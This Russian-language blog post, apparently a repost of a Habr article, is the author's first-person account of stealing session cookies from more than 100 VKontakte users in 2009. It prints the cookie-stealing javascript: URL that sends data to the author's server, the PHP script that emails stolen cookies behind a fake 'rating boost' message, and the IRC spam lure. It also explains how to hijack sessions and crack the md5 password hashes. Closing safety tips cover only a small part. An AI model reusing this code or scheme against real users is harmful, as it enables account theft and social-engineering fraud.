Всем привет. Многие из Вас, наверное, знакомы со способами взлома профилей вконтакте. Дальше опишу, как я в 2009 году украл доступы на более 100 профилей вконтакте за пару дней.
Коротко говоря, были реализованы такие действия:
1) Регистрация бесплатного хостинга;
2) Загрузка на хостинг простого PHP-скрипта, который получает GET-запрос и отправляет данные на мой e-mail;
3) Придумывание хитрого способа заставить пользователя ввести вредоносный код в адресную строку браузера;
4) Спам-рассылка.
Процесс взлома
Если кто-то помнит, то в 2009 году у пользователей сайта вконтакте был рейтинг, который можно было приобрести за голоса. Рейтинг влиял на выдачу в поиске людей, а также показывал популярность и крутость пользователя. Мне нужно было заставить пользователей вводить в адресную строку браузера следующий код (код отправляет куки на мой сервер):
javascript:window.location.replace("http://мойдомен/?a="+document.cookie);
Я принял решение мотивировать пользователей на это действие, якобы, увеличением рейтинга их профиля.
Дальше был написан и загружен на бесплатный хостинг такой код (index.php):
... <?php if(isset($_GET['a']) { // проверяем GET-запрос на существование mail('моя@почта', 'Украденный аккаунт vkontakte.ru', $_GET['a']); // бесплатный хостинг позволял использовать функцию mail() для отправки почты echo '<script type="text/javascript"> alert("Спасибо за заявку! В течении суток Ваш рейтинг вконтакте увеличится! Сообщите об этом способе друзьям, пока не прикрыли."); // выводим сообщение о зачислении рейтинга window.history.back(); // возвращаемся обратно на страницу вконтакте </script>'; } else { echo '<p>... Текст, убеждающий ввести javascript код в адресную строку браузера ...</p>'; } ...
Этот код принимал куки и отправлял мне на e-mail.
Поскольку в 2009 году irc-сети еще пользовались достаточной популярностью, я принялся за спам-рассылку именно там. Как бы просто и глупо это не выглядело, но результаты не заставили себя долго ждать. Этот способ, кстати, конвертировал по 20-50 жертв в сутки.
Письма были следующего содержания:
Что же делать дальше с этими данными? Можно было заменить куки в браузере, тем самым перехватить сессию пользователя и получить доступ к его странице вконтакте.
Возьмем md5-hash remixpass со скриншота и найдем его. Благо, md5 словарей много.
Итого: у нас уже есть e-mail, пароль и украденная сессия жертвы.
Заключение
Даже если Вы не станете вводить код в адресную строку, то это не гарантирует того, что Ваши куки не перехватят, например, внедрив XSS-атаку на сайт. (Про XSS можно почитать тут)
Советы по безопасности:
1. Всегда завершайте сеанс на сайте нажатием на кнопку «Выйти». Тем самым Вы убиваете сессию, что не дает возможности когда-либо воспользоваться украденными куками;
2. Не вводите в адресную строку браузера непонятный для Вас javascript код.
В заключение, хочу сказать, что примерно спустя полгода меня забанили на бесплатном хостинге. Также, что никто при этом не пострадал и все это было проделано в ознакомительных интересах.
ссылка на оригинал статьи https://habrahabr.ru/post/317410/
Добавить комментарий